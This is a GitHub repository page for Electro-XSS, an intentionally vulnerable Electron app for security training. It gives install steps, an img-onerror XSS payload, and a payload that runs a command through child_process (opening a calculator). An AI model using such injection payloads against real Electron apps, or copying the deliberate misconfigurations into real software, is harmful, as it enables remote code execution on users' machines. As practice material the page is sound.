Skip to content

Electro-XSS , a buggy desktop app developed with the Electron framework.

License

Notifications You must be signed in to change notification settings

MrH4r1/Electro-XSS

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Electro-XSS


Electro-XSS is a buggy desktop application developed with the Electron JS Framework. This application will assist you in grasping the electron apps' basic structure as well as the most common Dev misconfiguration. This app allows security professionals to simulate XSS and RCE attacks.

Requirements

Installation

git clone https://github.com/MrH4r1/Electro-XSS.git
cd Electro-XSS
npm install

alt text

Running Electro-XSS

 npm run electro-xss

alt text

XSS

<img src=x onerror=alert(1) />

alt text

RCE

<img src=x onerror=alert(require('child_process').execSync('gnome-calculator')); />

alt text

About

Electro-XSS , a buggy desktop app developed with the Electron framework.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published